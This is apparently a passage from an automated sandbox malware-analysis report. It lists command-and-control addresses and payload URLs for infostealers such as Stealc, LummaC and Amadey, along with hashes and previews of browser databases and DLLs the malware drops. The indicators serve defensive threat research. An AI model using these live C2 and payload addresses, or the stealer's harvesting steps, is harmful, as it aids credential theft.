                                  • 91.202.233.158/e96ea2db21fa9a1b.php
                                  oZB7n3wuNk.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                                  • 91.202.233.158/e96ea2db21fa9a1b.php
                                  mLn7GEEpuS.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                                  • 91.202.233.158/e96ea2db21fa9a1b.php
                                  V6n3oygctH.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                                  • 91.202.233.158/e96ea2db21fa9a1b.php
                                  194.116.215.195file.exeGet hashmaliciousAmadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RATBrowse
                                  • 194.116.215.195/12dsvc.exe
                                  file.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, Stealc, zgRATBrowse
                                  • 194.116.215.195/12dsvc.exe
                                  jD6b7MZOhT.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                  • 194.116.215.195/12dsvc.exe
                                  185.215.113.26file.exeGet hashmaliciousAmadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RATBrowse
                                  • 185.215.113.26/Nework.exe
                                  file.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, Stealc, zgRATBrowse
                                  • 185.215.113.26/Nework.exe
                                  jD6b7MZOhT.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                  • 185.215.113.26/Dem7kTu/index.php
                                  file.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, Cryptbot, LummaC StealerBrowse
                                  • 185.215.113.26/Dem7kTu/index.php
                                  XpCyBwDzEt.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, DanaBot, PureLog Stealer, RedLineBrowse
                                  • 185.215.113.26/Dem7kTu/index.php
                                  file.exeGet hashmaliciousLummaC, Amadey, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                  • 185.215.113.26/Dem7kTu/index.php
                                  OmnqazpM3P.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, VidarBrowse
                                  • 185.215.113.26/Dem7kTu/index.php
                                  Original_Build.exeGet hashmaliciousRaccoon Stealer v2Browse
                                  • 185.215.113.26/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  gutterydhowi.shopfile.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                  • 172.67.132.32
                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                  • 172.67.132.32
                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                  • 104.21.4.136
                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                  • 104.21.4.136
                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                  • 104.21.4.136
                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                  • 104.21.4.136
                                  SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.4.136
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.4.136
                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                  • 172.67.132.32
                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                  • 104.21.4.136
                                  fragnantbui.shopfile.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                  • 188.114.97.3
                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                  • 188.114.96.3
                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                  • 188.114.97.3
                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                  • 188.114.97.3
                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                  • 188.114.96.3
                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                  • 188.114.97.3
                                  SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeGet hashmaliciousLummaCBrowse
                                  • 188.114.97.3
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 188.114.97.3
                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                  • 188.114.96.3
                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                  • 188.114.96.3
                                  offensivedzvju.shopfile.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                  • 188.114.96.3
                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                  • 188.114.96.3
                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                  • 188.114.96.3
                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                  • 188.114.97.3
                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                  • 188.114.96.3
                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                  • 188.114.96.3
                                  SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeGet hashmaliciousLummaCBrowse
                                  • 188.114.97.3
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 188.114.96.3
                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                  • 188.114.97.3
                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                  • 188.114.97.3
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  M247GBfile.exeGet hashmaliciousPhorpiexBrowse
                                  • 91.202.233.141
                                  purchase order.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 172.86.66.70
                                  Ref_336210627.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 172.86.66.70
                                  sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                  • 91.202.233.169
                                  DRAFT BL - CLS930 KHH-TOLEDO(VIA NYC) SO6615#U21928152 WKH2406122.scr.exeGet hashmaliciousXWormBrowse
                                  • 104.250.180.178
                                  6122.scr.exeGet hashmaliciousRemcosBrowse
                                  • 104.250.180.178
                                  6122.scr.exeGet hashmaliciousRemcosBrowse
                                  • 104.250.180.178
                                  DRAFT BL - CLS930 KHH-TOLEDO(VIA NYC) SO6615#U21928152 WKH2406122.scr.exeGet hashmaliciousXWormBrowse
                                  • 104.250.180.178
                                  file.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog StealerBrowse
                                  • 91.202.233.158
                                  file.exeGet hashmaliciousAmadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RATBrowse
                                  • 91.202.233.158
                                  VMAGE-ASRUfile.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog StealerBrowse
                                  • 194.116.215.195
                                  file.exeGet hashmaliciousAmadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RATBrowse
                                  • 194.116.215.195
                                  file.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, Stealc, zgRATBrowse
                                  • 194.116.215.195
                                  jD6b7MZOhT.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                  • 194.116.215.195
                                  jsJ6NIt35F.exeGet hashmaliciousGo Injector, Stealc, VidarBrowse
                                  • 194.116.216.149
                                  1.exeGet hashmaliciousGo Injector, RHADAMANTHYSBrowse
                                  • 193.23.55.27
                                  1.bin.exeGet hashmaliciousGo Injector, RHADAMANTHYSBrowse
                                  • 193.23.55.27
                                  Catalog co.pdf.lnkGet hashmaliciousMalLnkBrowse
                                  • 45.89.53.91
                                  QTmGYKK6SL.exeGet hashmaliciousUnknownBrowse
                                  • 45.89.55.34
                                  laNODWeL05.elfGet hashmaliciousUnknownBrowse
                                  • 45.8.146.126
                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousAmadeyBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousAmadeyBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousAmadeyBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousAmadeyBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousAmadeyBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousAmadeyBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousAmadeyBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousAmadeyBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.37
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  a0e9f5d64349fb13191bc781f81f42e1http://intesa-it.serv00.net/it/conto/Get hashmaliciousUnknownBrowse
                                  • 104.21.4.136
                                  • 172.67.162.108
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  • 104.102.49.254
                                  • 104.21.2.13
                                  • 172.67.208.139
                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                  • 104.21.4.136
                                  • 172.67.162.108
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  • 104.102.49.254
                                  • 104.21.2.13
                                  • 172.67.208.139
                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                  • 104.21.4.136
                                  • 172.67.162.108
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  • 104.102.49.254
                                  • 104.21.2.13
                                  • 172.67.208.139
                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                  • 104.21.4.136
                                  • 172.67.162.108
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  • 104.102.49.254
                                  • 104.21.2.13
                                  • 172.67.208.139
                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                  • 104.21.4.136
                                  • 172.67.162.108
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  • 104.102.49.254
                                  • 104.21.2.13
                                  • 172.67.208.139
                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                  • 104.21.4.136
                                  • 172.67.162.108
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  • 104.102.49.254
                                  • 104.21.2.13
                                  • 172.67.208.139
                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                  • 104.21.4.136
                                  • 172.67.162.108
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  • 104.102.49.254
                                  • 104.21.2.13
                                  • 172.67.208.139
                                  Baylor financial-RemittanceSeptember 26, 2024_-YTRKOKQTQALJDQKMPCNJ.xlsxGet hashmaliciousUnknownBrowse
                                  • 104.21.4.136
                                  • 172.67.162.108
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  • 104.102.49.254
                                  • 104.21.2.13
                                  • 172.67.208.139
                                  SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.4.136
                                  • 172.67.162.108
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  • 104.102.49.254
                                  • 104.21.2.13
                                  • 172.67.208.139
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.4.136
                                  • 172.67.162.108
                                  • 188.114.97.3
                                  • 188.114.96.3
                                  • 104.102.49.254
                                  • 104.21.2.13
                                  • 172.67.208.139
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousStealc, VidarBrowse
                                    file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                      file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                              file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                      C:\ProgramData\mozglue.dllfile.exeGet hashmaliciousStealc, VidarBrowse
                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                              file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                          Category:dropped
                                                                          Size (bytes):20480
                                                                          Entropy (8bit):0.6732424250451717
                                                                          Encrypted:false
                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                          Category:dropped
                                                                          Size (bytes):51200
                                                                          Entropy (8bit):0.8746135976761988
                                                                          Encrypted:false
                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                          Category:dropped
                                                                          Size (bytes):196608
                                                                          Entropy (8bit):1.121297215059106
                                                                          Encrypted:false
                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):3117056
                                                                          Entropy (8bit):6.560473138005523
                                                                          Encrypted:false
                                                                          SSDEEP:49152:KYtaxqFC/PPqRsnxZniLwd2tnkbSJVKcD+YP://FWPqRsn7niLxk0Kc9P
                                                                          MD5:B19555358F3C9ABC6157B2B7AAB2F658
                                                                          SHA1:177FDA0D1D0444E6CF1CA8A915F5F2212BD092E1
                                                                          SHA-256:2B0062E5EF0C0BBC9034BA09296F47B26DD0528DD8131DCCFD10009A516B1104
                                                                          SHA-512:6BFF37EB0C5617FAB6512C9A31E701F04ABFE1B5EB1FA70B93C83DE9A118E434ECB1F49C6E7BAF5335AE32D8B04B296835F028CA8EEE7858C11A4797E07D64B0
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...VK.L.................."..........{"......."...@.........................../.....A]0.......................................".......#..>............................................................................"..............................text...J.".......".................`....rdata...1...."..@....".............@..@.data...XT... #..0... #.............@....rsrc....@....#..@...P#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):0.03859996294213402
                                                                          Encrypted:false
                                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                          MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                          SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                          SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                          SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                          Category:dropped
                                                                          Size (bytes):40960
                                                                          Entropy (8bit):0.8553638852307782
                                                                          Encrypted:false
                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                          Category:dropped
                                                                          Size (bytes):98304
                                                                          Entropy (8bit):0.08235737944063153
                                                                          Encrypted:false
                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                          File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):9504
                                                                          Entropy (8bit):5.512408163813622
                                                                          Encrypted:false
                                                                          SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                          MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                          SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                          SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                          SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                          Malicious:false
                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                          Category:dropped
                                                                          Size (bytes):106496
                                                                          Entropy (8bit):1.136413900497188
                                                                          Encrypted:false
                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                          Category:dropped
                                                                          Size (bytes):20480
                                                                          Entropy (8bit):0.8439810553697228
                                                                          Encrypted:false
                                                                          SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                          MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                          SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                          SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                          SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Windows\System32\svchost.exe
                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x94f7fc92, page size 16384, DirtyShutdown, Windows version 10.0
                                                                          Category:dropped
                                                                          Size (bytes):1310720
                                                                          Entropy (8bit):0.6586080123047318
                                                                          Encrypted:false
                                                                          SSDEEP:1536:BSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Baza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                          MD5:CE80836994689751F07E413A0180D4D8
                                                                          SHA1:BF354BC2EF3F4C2DB2012F76B54E6C1128F50916
                                                                          SHA-256:DE1FF3CA0CE41D7EE0072E5D778224CAC705873A3DD337FBE2E5C20A9BDDDF52
                                                                          SHA-512:3D58A8A07B742A1B0B39CBFAF7F2C862DDEE5F789476AA51BAF2316A4AD3AED7369C4C8DF24A16C05F3EBFF800D99FEE9ECD9E5CCD5725E98FFE94FB76E0C232
                                                                          Malicious:false
                                                                          Preview:....... ...............X\...;...{......................0.z..........{.......|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................?R.O.....|.................vgso.....|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):685392
                                                                          Entropy (8bit):6.872871740790978
                                                                          Encrypted:false
                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
